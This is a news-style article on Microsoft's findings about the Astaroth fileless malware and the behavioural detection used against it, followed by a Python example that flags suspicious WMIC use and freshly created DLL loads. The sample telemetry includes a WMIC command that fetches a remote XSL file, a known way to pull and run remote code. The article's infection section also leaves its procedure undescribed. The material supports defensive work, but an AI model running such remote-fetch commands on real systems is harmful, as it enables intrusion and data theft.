Microsoft recently lifted the veil on Astaroth, a particularly unpleasant piece of fileless malware that steals data without ever being installed on the victim's machine in the conventional sense.
The published report by Microsoft's research team, which exposed the activities of the Astaroth fileless malware, forced the threat actors behind it to change their tactics. They ran a new campaign in August with a few notable changes, most notably the use of Cloudflare Workers as infrastructure.
Named after a demon from the occult texts 'Ars Goetia' and 'The Key of Solomon', said to seduce his victims through vanity and laziness, this malware has been in circulation since 2017; the threat has accordingly been dubbed the 'Great Duke of Hell' malware attack. It has mostly been used to steal data from South American and European companies in targeted attacks that use spear phishing as the point of entry.
According to Andrea Lelli of the Microsoft Defender ATP Research Team, what makes this particular infection unique is its ability to slip past the detection methods of some traditional antivirus programs.
According to Lelli, Astaroth is notorious for information stealing: personal credentials, keystrokes and more, all of which is exfiltrated to a remote server. The attackers then use the data for financial theft, for sale to other criminals, or to move laterally across the victim's network.
How Astaroth Infects Systems
The procedure works well against signature-based detection tools: apart from the DLL files, nothing is downloaded or installed, so there is little opportunity to scan and catch the attack while it is in progress. This approach allowed Astaroth to fly under the radar and thrive since late 2017 without the usual reliance on trojan downloaders or on any vulnerability exploit.
Fileless Malware Detection Measures
According to Lelli, traditional file-centric antivirus solutions get only one chance to detect the attack: during the download of the two DLL files, since the executable used in the attack is considered non-malicious. The DLLs use code obfuscation and vary between campaigns, which means focusing detection on those two files would be 'a vicious trap', Lelli added.
Microsoft and other vendors have had to rely instead on behavioural, heuristic detection: closely watching for suspicious use of the WMIC command line, and applying rules at the moment a DLL is loaded rather than when it is written to disk. Checking the age of the file and blocking newly created DLLs from running, along with similar tactics, allow newer security tools to catch up with fileless malware.
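The two heuristics the article describes, suspicious WMIC usage and a DLL being loaded shortly after it appeared on disk, can be expressed as simple rules over endpoint telemetry. The following is an added example written for this page, not code from Microsoft or from the report it summarises. It runs over a handful of constructed events shaped like EDR/Sysmon process-creation and image-load records. The specific patterns (WMIC with a remote URL in its command line, a ten-minute DLL age threshold, a DLL whose creation time lies after its load time treated as a timestamp anomaly) are assumptions chosen for illustration, not rules taken from the page.

```python
"""Heuristic rules for two fileless-malware signals: WMIC pulling remote
content, and a freshly created DLL being loaded. Added example; the event
records below are constructed for the demo, not real telemetry."""
import re
from datetime import datetime, timedelta

# Constructed sample telemetry (not real captures).
SAMPLE_EVENTS = [
    # Benign: an administrator querying WMI locally.
    {"type": "process", "ts": "2019-08-12T09:58:00",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic os get caption,version"},
    # Suspicious: WMIC told to fetch a remote resource (assumed pattern).
    {"type": "process", "ts": "2019-08-12T10:00:05",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": 'wmic os get /format:"http://203.0.113.10/style.xsl"'},
    # Benign: a system DLL that has been on disk for months.
    {"type": "image_load", "ts": "2019-08-12T10:00:20",
     "process": r"C:\Windows\System32\svchost.exe",
     "dll": r"C:\Windows\System32\wbemcomn.dll",
     "dll_created": "2019-03-01T12:00:00"},
    # Suspicious: a DLL written four seconds before a signed Windows binary loads it.
    {"type": "image_load", "ts": "2019-08-12T10:00:31",
     "process": r"C:\Windows\System32\rundll32.exe",
     "dll": r"C:\Users\alice\AppData\Local\Temp\abc123.dll",
     "dll_created": "2019-08-12T10:00:27"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
MAX_DLL_AGE = timedelta(minutes=10)  # assumed threshold for "newly created"


def _ts(s: str) -> datetime:
    return datetime.fromisoformat(s)


def wmic_remote_fetch(ev: dict):
    """Rule 1: wmic.exe whose command line references a remote URL.
    Returns a rule name on a hit, otherwise None."""
    if ev.get("type") != "process":
        return None
    if not ev.get("image", "").lower().endswith("\\wmic.exe"):
        return None
    if not URL_RE.search(ev.get("cmdline", "")):
        return None
    return "wmic_remote_fetch"


def fresh_dll_load(ev: dict, max_age: timedelta = MAX_DLL_AGE):
    """Rule 2: image load of a DLL created within max_age of the load.
    A creation time later than the load time cannot happen naturally and is
    flagged separately (assumed to indicate clock or timestamp tampering)."""
    if ev.get("type") != "image_load":
        return None
    age = _ts(ev["ts"]) - _ts(ev["dll_created"])
    if age < timedelta(0):
        return "dll_created_after_load"
    if age <= max_age:
        return "fresh_dll_load"
    return None


def detect(events, max_age: timedelta = MAX_DLL_AGE):
    """Run both rules over a sequence of events and return
    (timestamp, rule, subject) tuples for every hit."""
    alerts = []
    for ev in events:
        for hit in (wmic_remote_fetch(ev), fresh_dll_load(ev, max_age)):
            if hit:
                alerts.append((ev["ts"], hit, ev.get("cmdline") or ev.get("dll")))
    return alerts


if __name__ == "__main__":
    for ts, rule, subject in detect(SAMPLE_EVENTS):
        print(f"{ts} {rule}: {subject}")
```

The rules fire on behaviour rather than on file hashes: the URL check catches WMIC being repurposed as a downloader regardless of what it fetches, and the age check catches the DLL at the load event, the one point where the article notes file-centric scanners have already missed their chance. In production both rules would be tuned against a baseline (software installers legitimately drop and load fresh DLLs), so the threshold is a parameter rather than a constant.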